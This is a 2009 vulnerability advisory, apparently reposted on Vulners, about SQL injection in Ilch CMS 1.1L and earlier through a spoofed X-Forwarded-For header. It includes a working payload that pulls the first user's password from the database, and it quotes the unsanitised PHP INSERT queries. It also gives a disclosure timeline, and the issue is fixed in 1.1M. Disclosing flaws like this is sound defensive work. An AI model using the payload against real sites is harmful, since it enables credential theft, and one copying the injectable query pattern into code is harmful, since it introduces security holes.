`Ilch CMS (from http://ilch.de) is vulnerable to sql-injection
Prone to the vulnerabilty are the guestbook and the statistics.
- Affected Versions: ilch 1.1L and below
- Not vulnerable: ilch 1.1M
- Exploit: Spoof your x-forwarded-for header to:
127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0
ORDER BY `id` LIMIT 1)) /*
Then create a guestbook entry.
- Timeline:
3.Feb.09: Vuln reported to ilch.de
3.Feb.09: Got reply from ilch
4.Feb.09: Version 1.1M is available which fixes the issue
Here is a summary of the vulnerability:
# in include/includes/func/statistics.php is missing user input
sanitization:
function getip() {
if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
return ($_SERVER["HTTP_X_FORWARDED_FOR"]);
} else {
return ($_SERVER["REMOTE_ADDR"]);
}
}
# in include/contents/gbook.php getip() is used without validation
db_query("INSERT INTO prefix_gbook
(`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."',
'".$page."', '".time()."', '".getip()."', '".$txt."')");
# There is also getip() used in includes/func/user.php, but its way harder
to exploit:
db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES
('".session_id()."',now(),'".getip()."')");
Please credit the discovery to Gizmore from wechall.net :)
Kind Regards
Gizmore
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation